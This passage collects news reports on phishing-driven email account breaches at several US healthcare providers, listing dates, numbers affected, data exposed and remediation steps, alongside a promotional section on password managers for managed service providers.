Although no proof was found that pointed out the attackers had viewed or acquired the emails, the chances could not be ruled out. An evaluation of the PHI within the accounts was done on August 25, 2021. The compromised information includes names, financial account information, driver’s license numbers, and Social Security numbers. UMass Memorial Health stated free credit monitoring and identity theft protection services were given to impacted people. UMass Memorial stated it is improving email security and will be re-educating the employees on email guidelines.

The breach has been reported to the Maine Attorney General as affecting a total of 3,099 individuals across the United States.

How Password Managers Protect MSPs

A quickly growing business is the offering of password managers for MSPs. This is because cybercriminals are targeting more Managed Service Providers. A recent “State of the Channel” survey revealed that 95% of MSP respondents state that their businesses were being attacked instead of the clients they provide with managed services.

It’s obvious why cybercriminals are attacking MSPs. When a “supply-chain ransomware attack” on an MSP succeeds, it could keep an MSP from providing its clients with its services; and even if only the MSPs’ systems are encrypted, clients can’t run their businesses because of the type of services delivered by the MSP.

Cybercriminals are also attacking SMB clients, but not as much as MSPs. The Datto “State of the Channel” survey reported that 78% of the respondents stated SMB clients had been attacked in the last two years with spyware, adware, and viruses causing as much trouble as ransomware. Even more troubling were the methods used by the cybercriminals to access systems and deploy malware:

  • Reported attacks by 54% of respondents were due to a phishing email
  • Reported attacks by 27% of respondents were due to poor user practices.
  • Reported attacks by 26% of respondents were because of a deficiency of cybersecurity training
  • Reported attacks by 24% of respondents were due to weak passwords and also bad credential management.

Other respondents stated that attacks succeeded because of lost and stolen user credentials, a deficiency of financing for IT security, and insufficiency of executive buy-in for using security tools. All of these causes are preventable or could be mitigated by employing a password manager for MSPs.

How Can Password Managers Protect MSPs

One lacking statistic from Datto´s State of the Channel report is the number of cyberattacks due to MSP susceptibility versus the number of cyberattacks due to client susceptibility. Although it could be presumed that clients are less difficult targets because of a lack of security competence, it is obvious the report says over fifty percent [of MSPs] currently use multi-factor authentication and password management tools.

Using the word “now” implies that less than fifty percent of MSPs were using password management tools in the past. Once again, there is no differentiation between the exclusive use of password managers within the MSP companies and the provision by MSPs of password-management-as-a-service to clients.

The creation, saving, and sharing of login credentials between teams can impact a business´s online protection. According to research, a lot of employees utilize weak passwords simply because they are easier to remember, re-use passwords in several accounts to save needing to recall several passwords, save login credentials in unprotected files, and share security passwords through unsecured avenues of communication like email, chat services, and SMS.

When companies use a password manager, they could likewise implement password policies necessitating the usage of tough, unique passwords for every account. The majority of commercial password managers feature cross-browser, cross-platform synchronization, use with directory services, and protected encrypted credential sharing, so employees have a secure means to swap passwords, credit card information, and other sensitive data.

Password managers for MSPs may be utilized to secure business credentials and clients’ credentials. Passwords are kept in a protected user vault and, whenever a user visits a site that vault has a saved password, the sign-in credentials are auto-filled. Therefore, when a user unintentionally clicks on a phishing email and lands on a phony phishing site, the sign-in credentials won’t auto-fill – notifying the user of a likely threat.

With password guidelines requiring good password tactics, teaching users on good password care, and getting rid of the possibility for weak passwords, the major methods used by cybercriminals to access MSP systems are removed. Regarding the insufficiency of funds for IT security or executive buy-in, password managers for MSPs are affordable in comparison to the price of recovering from a cyberattack and – if given to clients as “password-management-as-a-service,” password managers for MSPs could get more revenue than the cost.

Phishing Attacks at Star Refining & Express MRI

Express MRI, a medical imaging center based in Peachtree Corners, GA, has begun informing patients regarding the exposure of some of their protected health information (PHI) due to a historic data breach. Express MRI found out on July 10, 2020 that an unauthorized person had acquired access to one email account and utilized it to send unauthorized email messages. The occurrence was explored back then, however, it was confirmed that no patient data was accessed.

On June 10, 2021, another evaluation of the security breach was done, and although no particular evidence was found that suggested unauthorized data access or theft, Express MRI deduced that it wasn’t really feasible to completely rule out data access or exfiltration by unauthorized individuals, for that reason Express MRI issued breach notification letters.

An analysis of the breached account confirmed the potential access or exfiltration of the following data: names, email addresses, addresses, birth dates, patient ages, referring doctor names, part of the body scanned, and if the scan was associated to a workers’ payment claim or investigation of a motor vehicle accident. There is no other patient information present in the breached email accounts.

Express MRI stated it took the essential and prompt steps to deal with the incident, which include putting together a team of very competent experts to strengthen the security of its data systems and carry out more safety measures to avoid other breaches.

Star Refining Phishing Attack Impacts 1,910 People

Adelda Health, Inc. also known as Star Refining, has found out that unauthorized persons obtained access to several employees’ email accounts after responding to phishing emails. The personal data of 1,910 people may have been accessed or exfiltrated.

The dental refining company in West Palm Beach, FL discovered the breach on April 29, 2021. A third-party computer forensics company is helping to make sure the incident was completely remediated and to find out the nature and extent of the breach.

An analysis of the breached email accounts showed they contained sensitive information like first and last names, postal addresses, Social Security numbers, driver’s license numbers, and credit card/financial details; nevertheless, there is no evidence that suggested the emails with that data were seen or obtained during the breach of the accounts. The first account access happened on April 12, 2021.

Notifications began to be delivered to impacted persons on July 22, 2021. Free Identity Works credit monitoring and identity theft protection services via Experian were given to impacted persons.

Over 447K Patients Impacted by Orlando Family Physicians Phishing Attack

An unauthorized person accessed the email accounts of Orlando Family Physicians in Florida that contain the protected health information (PHI) of 447,426 patients.

Orlando Family Physicians stated that the compromise of the first email account happened on April 15, 2021 because an employee responded to a phishing email and exposed their account login information. The provider immediately took action to stop unauthorized access and started an investigation to find out the nature and scope of the breach.

With the help of a top-rated cybersecurity forensics company, Orlando Family Physicians confirmed that three more employee email accounts were accessed by unauthorized person. External access to the four compromised email accounts had been blocked in 24 hours after the first unauthored account access.

On May 21, 2021, Orlando Family Physicians confirmed that the unauthorized person possibly accessed email messages in the email account that included patients’ PHI. A review of the email messages and attachments was done, and on July 9, 2021, Orlando Family Physicians had identified all impacted persons.

The email accounts included the personal data and PHI of present patients, prospective patients, workers, and other people. The types of data in the accounts differed from person to person and included at least one of these data elements: Names, demographic information, diagnoses, names of providers, prescription medications, medical record numbers, patient account numbers, medical insurance data (Medicare beneficiary number or another subscriber ID number), and passport numbers.

The phishing attack seems to have been executed with the goal of undertaking financial fraud towards the practice rather than acquiring patient records. Nonetheless, because unauthorized data access and exfiltration cannot be excluded, impacted persons have been instructed to exercise extreme care and carefully monitor their explanation of benefits statements and financial accounts for indications of fraudulent transactions.

Orlando Family Physicians has improved its technical security procedures after the breach and additional training on email security is being given to its employees.

More than 200,000 People Potentially Impacted by ClearBalance Phishing Attack

ClearBalance in San Diego, CA, a loan provider that allows patients to distribute the cost of their hospital expenditures, was affected by a phishing attack last March 8, 2021 and workers were fooled into exposing their sign-in credentials.

ClearBalance discovered the email system breach on April 26, 2021 the moment the hacker tried to make a bogus wire transfer. Action was quickly taken to protect the email system and stop more unauthorized access, and the attempt to make a wire transfer did not succeed. No money was moved to the hacker’s account.

A third-party computer forensic team was involved to look into the breach and to figure out if the attacker viewed or acquired any sensitive information. The investigator affirmed that the breach only affected the email system and did not affect any other system and that the unauthorized person was blocked from accessing the email accounts on the day of discovering the breach.

The attacker did not obtain access to the database that holds the health care record systems of any healthcare company; nevertheless, a number of sensitive information was found in email messages and file attachments which were possibly accessed. An analysis of the email accounts’ contents showed they included these data elements:

Names, tax IDs, birth dates, Social Security numbers, government-issued ID numbers, phone numbers, balance amounts, healthcare account numbers, dates of service, ClearBalance loan numbers and balances, private banking details, clinical data, medical insurance data, and full-face photographic pics. Most people didn’t have PHI particularly affected.

Security measures were strengthened to better secure the email system and personal information, all user security passwords were altered, stronger access settings are put in place on the system, and procedures for submitting suspicious activity reports were kept up to date.

The objective of the attack seems to be to make bogus wire transfers instead of getting sensitive information; nevertheless, as a safety measure against identity theft and fraud, ClearBalance provided impacted people with free identity theft protection services, 2 years of credit monitoring services, and payment insurance coverage plus an identity theft insurance reimbursement guide.

The breach was submitted to the HHS’ Office for Civil Rights as impacting 209,719 people.

Phishing Attack on Saint Alphonsus Health System and Southeastern Minnesota Center for Independent Living

Saint Alphonsus Health System based in Boise, ID experienced a phishing attack that resulted in the potential exposure of patient information. The attack also impacted patients of Saint Agnes Medical Center in Fresno, CA.

Saint Alphonsus discovered strange activity in the email account of one worker on January 6, 2021. The provider quickly secured the account and conducted an investigation to find out the source and nature of the phishing activity. Saint Alphonsus learned that an unauthorized individual accessed the email account on January 4, 2021, and had access to the account and data held therein for 2 days. The attacker used the email account to send phishing emails to other contact people in an attempt to steal usernames and passwords.

The employee whose credentials were compromised assisted with a number of business functions that required access to protected health information (PHI), including sending billing for the West Region of Trinity Health, and Fresno.

An analysis of all email messages and file attachments revealed the account comprised the PHI of selected patients. The PHI in the account varied from one patient to another and contained full names along with one or more of these data elements: telephone, date of birth, address, email, medical record number, treatment data, and/or billing details. The account additionally included some Social Security numbers and credit card numbers.

Although the provider confirmed the unauthorized account access, it was not possible to ascertain which emails, if any, the attacker accessed. While distributing notifications, no evidence was found that indicates the misuse of any patient information. Saint Alphonsus offered credit monitoring services to affected persons and gave workers further training about email and cybersecurity to avoid the same breaches in the future.

When notifying patients regarding the breach, an error with the mail merge happened. Some patients have received a letter informing them regarding an email security issue and regrettably, the letters generated had an incorrect status for a number of patients, addressing them as deceased or a minor because of the mail merge issue.

It isn’t presently known how many patients were impacted by the breach. Updates will be provided when there’s more information available.

Southeastern Minnesota Center for Independent Living Phishing Attack Impacts 4,122 Individuals Affected

Southeastern Minnesota Center for Independent Living (SEMCIL), a disability and support services provider in Rochester and Winona, has found out an unauthorized person who obtained access to the email account of an employee containing the PHI of 4,122 people.

An investigation into the security incident showed the account was exposed on August 6, 2020 and the hacker got access to the account until September 1, 2020. The investigation affirmed on December 22, 2020 the compromise of PHI, including names, addresses, dates of birth, driver’s license numbers, Social Security numbers, and certain medical treatment details. SEMCIL started sending breach notification letters to affected persons on February 19, 2021.

The investigation did not get any proof that suggests the access or exfiltration of any protected health information. There is likewise no report received that indicates the improper use of any PHI. As a safety measure against identity theft and fraud, those who had their Social Security number or driver’s license number exposed received free offers of identity theft protection services.

PHI Exposed Due to Breaches at Elara Caring, ProPath and Cornerstone Care

Elara Caring, one of America’s largest home-based healthcare services providers, has experienced a phishing attack that impacted over 100,000 patients.

In mid-December, the provider identified suspicious activity in a number of email accounts of employees. It took prompt action to keep the accounts safe and prevent the attackers from accessing the accounts. A third-party security firm helped in investigating the breach.

The investigation affirmed that an unauthorized individual accessed several employee email accounts, though no proof was identified that suggests the attackers viewed or obtained any patient information in the email accounts. It wasn’t possible to eliminate data theft.

An analysis of the exposed email accounts revealed they held the PHI of 100,487 patients, such as names, dates of birth, Employer ID numbers, driver’s license numbers, Social Security numbers, financial/bank account details, passport numbers, addresses, email addresses and passwords, insurance data and insurance account numbers. Elara Caring offered the individuals affected by the attack complimentary credit monitoring and identity protection services.

The provider also took steps to enhance data security and has given more training on cybersecurity to its employees.

ProPath Email Accounts Breached by an Unauthorized Individual

ProPath, the United States’ biggest, countrywide, fully physician-owned pathology practice, has identified an unauthorized person who got access to two email accounts with patient records.

The unauthorized individual accessed the email accounts between May 4, 2020 and September 14, 2020. ProPath found out on January 28, 2021 that protected health information in the email accounts included the names of patients, birth dates, test orders, diagnosis and/or clinical treatment info, medical procedure details, and physician name. The Social Security number, financial account information, driver’s license number, health insurance data, and/or passport number of a limited number of people were also affected.

Persons whose Social Security number was breached were provided credit monitoring services for free. Workers have acquired additional training to aid them to identify malicious email messages and further technical security measures have now been implemented.

It is not yet confirmed exactly how many persons the incident impacted. ProPath stated most people who obtained testing from the company were not affected by the incident.

Cornerstone Care Email Account Breach Impacts 11,487 Patients

An unauthorized person accessed an email account that contains the PHI of 11,487 patients receiving services from Cornerstone Care community health centers located in Southwestern Pennsylvania and Northern West Virginia.

The provider detected the email account breach on June 1, 2020 and engaged third-party security specialists to assist investigate the breach. It was established that the breach only impacted a single corporate email account. An evaluation of the PHI included in the account was finished on January 13, 2021.

The account held the names and addresses of patients as well as, for selected people, date of birth, Social Security number, medical background, ailment, treatment procedure, diagnosis, and/or medical insurance data. Those whose Social Security number was exposed received free credit monitoring and identity theft protection services.

Cornerstone Care notified by mail the affected persons on February 25, 2021. It additionally enforced multi-factor authentication on the email accounts.

3 Healthcare Providers Have Began Notifying Patients Regarding Recent Phishing Attacks

This is a summary of healthcare phishing attacks that were publicly announced in the last couple of days.

2,254 Patients Affected by Email Account Breach at Leonard J. Chabert Medical Center

Leonard J. Chabert Medical Center received notified that the protected health information (PHI) of some of its patients was compromised because of a phishing attack on LSU Health New Orleans Health Care Services Division (LSU HCSD).

LSU HCSD reported a breach on November 20, 2020. On November 24, 2020, it found out that a number of patient information coming from Leonard J. Chabert Medical Center, one of its partner hospitals, had likewise been affected by the breach.

Leonard J. Chabert Medical Center received information about the breach on December 3, 2020, the evaluation of which showed that the PHI of 2,254 patients were exposed from September 15, 2020 up to September 18, 2020.

For the majority of patients, the exposed information only included names, telephone numbers, addresses, health record numbers, birth dates, account numbers, types of services gotten, dates of service, and medical insurance identification numbers. The limited health data for example diagnoses and/or bank account numbers of a small number of patients were likewise exposed.

LSU HCSD is going over its email security procedures, which will be improved to avoid the same breaches later on and more security awareness training will be given to staff members.

PHI of 1,800 Patients Possibly Compromised Due to Lynn Community Health Center Phishing Attack

Lynn Community Health Center (LCHC) based in Massachusetts discovered that an unauthorized individual accessed a staff member’s email account subsequent to responding to a phishing email. LCHC discovered the phishing attack on November 25, 2020 and promptly secured the email account. With the help of a digital forensics agency, LCHC established that up to 4 email accounts were compromised in the phishing attack.

An analysis of the possibly breached accounts revealed they included patient names along with one or more of these data elements: Mailing address, date of birth, phone number, insurance details, medical record number, diagnoses, and other clinical data. The Social Security number of a number of patients were additionally exposed.

The ongoing investigation has not found any proof that suggests patient data theft or misuse, however, as a preventive measure, people who had their Social Security number potentially compromised received offers of credit monitoring and identity theft protection services for free.

More safety measures are being put in place to avoid further email security breaches. Information protocols are being modified, and worker security awareness training was improved.

Auris Health Informs Patient Regarding March 2020 Email Account Breach

Auris Health located in Redwood City, CA started notifying a number of patients concerning an unauthorized person who possibly obtained access to some of their PHI because of an employee email account breach in March 2020.

Upon knowing about the breach, access to the account was blocked and an investigation was performed to find out the nature and magnitude of the breach. The inquiry into the attack is in progress, nevertheless, Auris Health has learned that the compromised email account held patient names combined with at least one of the following data elements: tax identification number, Social Security Number, passport number, health insurance number, health data, payment card details, and financial account number(s).

Auris Health is employing extra security measures to avert more breaches later on, such as improving its email authentication procedures. Affected persons got offers of complimentary membership to credit and identity theft monitoring services for two years.